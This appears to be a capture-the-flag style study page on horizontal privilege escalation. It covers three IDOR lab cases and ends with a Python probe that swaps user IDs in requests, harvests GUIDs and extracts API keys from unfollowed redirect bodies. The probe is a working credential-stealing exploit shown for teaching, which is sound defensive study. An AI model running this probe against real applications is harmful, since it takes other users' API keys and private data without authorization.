Horizontal PrivEsc

Horizontal privilege escalation is when a user gains access to resources or data belonging to another user at the same privilege level, rather than only their own.

For example: an employee is only supposed to see their own payroll records or documents, but manages to view another employee's details. That is horizontal privilege escalation.

The technique is the same as in the vertical case: the user reaches another user's content by tampering with the identifier in the URL, for instance

https://example.com/myaccount=123

Changing that identifier to another user's value returns their account page, and with it their API key.

An API key is a unique identifier used to authenticate a user, developer, or calling program to an API, so leaking it is equivalent to leaking a credential.

User ID controlled by Request Parameter

In the lab URL, change the user identifier in the query string from your own username to carlos. The response is carlos's account page, which contains his API key; that key is the flag.

Request Parameter with Unpredictable user ID's

In some applications the exploitable parameter is not sequential: the application may use globally unique identifiers (GUIDs) to identify users.

An attacker cannot realistically guess another user's GUID, so the only option is to enumerate the application thoroughly and look for places where other users' IDs are disclosed, such as user messages, reviews, or profile links.

Crawl the application, find another user's ID, and substitute it for your own in the GET request to the account page.

Request Parameter with Data Leakage in Redirect

Some applications detect that the user is not permitted to access a sensitive resource and redirect them to the login page.

Always examine the response that carries the redirect (the 3xx response itself) rather than just following it, because its body may still contain sensitive information belonging to the targeted user. If it does, the access control check is only cosmetic and the attack succeeds.

Check the body of the redirect response for a leaked API key; a browser will never show it to you, but a proxy or a script with redirects disabled will.
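The following is an added example, not code from the original page, covering the three cases above in one small probe: rewriting the user identifier in the query string, harvesting GUID-shaped user IDs from crawled pages, and inspecting a redirect response body for a leaked API key. The hostname, parameter name `id`, the victim username `carlos`, the key pattern, and the sample HTML are all constructed assumptions for illustration.

```python
"""Added example (not from the original page): a small IDOR probe for
the three horizontal-privesc cases above.  Hostnames, parameter names,
the key format and the sample responses are constructed assumptions."""
import re
from http.client import HTTPConnection, HTTPSConnection
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Assumption: the key is rendered near the words "API key" and is a run
# of 16+ alphanumerics.  Adjust to the target application's markup.
API_KEY_RE = re.compile(r"API\s*key.{0,20}?([A-Za-z0-9]{16,})", re.IGNORECASE)
# RFC 4122-style GUID, for the "unpredictable user IDs" case.
GUID_RE = re.compile(
    r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b",
    re.IGNORECASE,
)


def swap_user_param(url: str, param: str, victim: str) -> str:
    """Return `url` with query parameter `param` set to `victim`
    (e.g. id=wiener -> id=carlos); other parameters are preserved."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = victim
    return urlunsplit(parts._replace(query=urlencode(query)))


def find_user_ids(html: str) -> set:
    """Harvest GUID-shaped identifiers from crawled pages (posts, reviews,
    profile links) so an unpredictable user ID can still be substituted."""
    return {m.lower() for m in GUID_RE.findall(html)}


def inspect_response(status: int, headers: dict, body: str) -> dict:
    """Look for an API key in a response body, *including* the body of a
    3xx redirect, which a browser discards before you ever see it."""
    leaked = API_KEY_RE.search(body)
    return {
        "status": status,
        "redirected_to": headers.get("Location") if 300 <= status < 400 else None,
        "api_key": leaked.group(1) if leaked else None,
    }


def probe(url: str, param: str, victim: str, session_cookie: str) -> dict:
    """Live version (needs network access): one GET with redirects NOT
    followed, so the redirect response itself is what gets inspected."""
    target = swap_user_param(url, param, victim)
    parts = urlsplit(target)
    conn_cls = HTTPSConnection if parts.scheme == "https" else HTTPConnection
    conn = conn_cls(parts.netloc, timeout=10)
    path = parts.path + ("?" + parts.query if parts.query else "")
    conn.request("GET", path, headers={"Cookie": session_cookie})
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return inspect_response(resp.status, dict(resp.getheaders()), body)


# Constructed sample responses standing in for the lab server.
SAMPLE_302_LEAK = (
    302,
    {"Location": "/login"},
    "<h1>My Account</h1><p>Your API key is: ABCDEFGHIJKLMNOPQRST1234</p>",
)
SAMPLE_GUID_PAGE = (
    "<p>Posted by carlos "
    "<a href='/my-account?id=3f2a9c1e-7b4d-4e6a-9c1f-0d2e8b5a7c33'>profile</a></p>"
)

if __name__ == "__main__":
    print(swap_user_param("https://example.com/my-account?id=wiener", "id", "carlos"))
    print(find_user_ids(SAMPLE_GUID_PAGE))
    print(inspect_response(*SAMPLE_302_LEAK))
```

The point of `probe` is that it never follows the redirect: `http.client` returns the 302 as-is, so the body that the login redirect was supposed to hide is exactly what `inspect_response` reads. Against the constructed `SAMPLE_302_LEAK` the result reports both the redirect to `/login` and the leaked key.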


Last updated 2 years ago